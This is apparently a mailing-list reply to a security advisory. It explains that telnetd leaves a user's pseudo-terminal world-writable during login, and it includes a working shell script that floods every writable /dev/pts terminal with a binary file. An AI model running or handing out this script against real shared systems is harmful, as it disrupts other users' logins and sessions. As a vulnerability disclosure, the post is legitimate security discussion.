Re: Securax Advisory 13

[teleh0r <teleh0r () DOGLOVER COM>]

I wrote a shell script which would flood the terminal of a user
trying to log in a long time ago - it was placed on my website
and someone called: "c0sa_n0stra", mailed me and asked me to
explain how it worked and then he was kind enough to send it to
packetstorm, adding his handle in the process (and a ascii cow).

(http://packetstorm.securify.com/DoS/m000h.sh)

The problem is the way that the telnet daemon assigns a new user
a terminal - when a user is telling the telnetd who he is, and
what his password is, his terminal will be awaiting in /dev/pts/
and writable by anyone. As soon as he has logged in, it will not.

It is still possible for him to log in though, even if a binary is
cat'ed to the terminal.
(but as said by Fyodor, it may mess-up his terminal)

sshd/rshd/rlogind do not behave this way - there will be no writable
terminal in /dev/pts/ while the authentication is taking place.

The below script has been tested on Redhat 6.1 and 6.2.
----
#!/bin/sh

TTYDIR=/dev/pts
NONSENSE=/bin/nice
MYTTY=`tty` # To prevent flooding of one's own TTY

while :; do
    for i in $TTYDIR/* ; do
        if [ -w $i -a -c $i -a $i != $MYTTY ]; then
            cat $NONSENSE > $i
        fi
    done
done

unset i
----

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
                -- Elbert Hubbard